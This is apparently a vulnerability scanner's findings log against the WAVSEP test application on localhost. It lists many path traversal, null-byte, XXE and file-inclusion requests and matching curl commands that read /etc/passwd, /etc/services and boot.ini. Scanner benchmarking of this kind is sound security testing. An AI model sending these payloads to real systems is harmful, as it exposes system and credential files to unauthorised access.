Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
